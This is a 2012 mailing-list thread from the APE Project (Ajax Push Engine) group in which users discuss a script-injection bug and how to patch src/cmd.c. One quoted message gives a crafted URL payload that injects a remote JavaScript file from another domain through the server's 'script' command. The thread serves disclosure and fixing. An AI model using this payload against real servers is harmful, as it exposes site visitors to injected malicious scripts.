You would have to patch the file, rebuild the server and replace the generated aped file with the one in your installation.
Before digging into the source can you verify if the hook i mentioned above fixes this bug? On Dec 12, 2012 7:52 PM, "UTAN" <[email protected]> wrote: > Indeed , thanks for point it out Pablo.. > Now what should i just edit and patch and the file and then reload Ape > or I have to reinstall all over? > > On Dec 12, 10:20 am, Pablo Tejada <[email protected]> wrote: > > He did mentioned src/cmd.c > > On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> wrote: > > > > > > > > > > > > > > > > > Have you released any patch, if you made some workaround what file > > > should we patch? > > > > > On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote: > > > > I managed recently with an issue that allows to inject any js script > by > > > > preparing link like: > > > > http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}] > > > > > > It allows either attach script from your url or inject script > directly > > > such > > > > as in this example. > > > > > > The solution for this issue is to filter both params domain and > scripts > > > in > > > > file src/cmd.c (function: cmd_script()) in ape server. > > > > > -- > > > You received this message because you are subscribed to the Google > > > Groups "APE Project" group. > > > To post to this group, send email to [email protected] > > > To unsubscribe from this group, send email to > > > [email protected] > > > For more options, visit this group at > > >http://groups.google.com/group/ape-project?hl=en > > > --- > > > APE Project (Ajax Push Engine) > > > Official website :http://www.ape-project.org/ > > > Git Hub :http://github.com/APE-Project/ > > -- > You received this message because you are subscribed to the Google > Groups "APE Project" group. > To post to this group, send email to [email protected] > To unsubscribe from this group, send email to > [email protected] > For more options, visit this group at > http://groups.google.com/group/ape-project?hl=en > --- > APE Project (Ajax Push Engine) > Official website : http://www.ape-project.org/ > Git Hub : http://github.com/APE-Project/ > -- You received this message because you are subscribed to the Google Groups "APE Project" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/ape-project?hl=en --- APE Project (Ajax Push Engine) Official website : http://www.ape-project.org/ Git Hub : http://github.com/APE-Project/
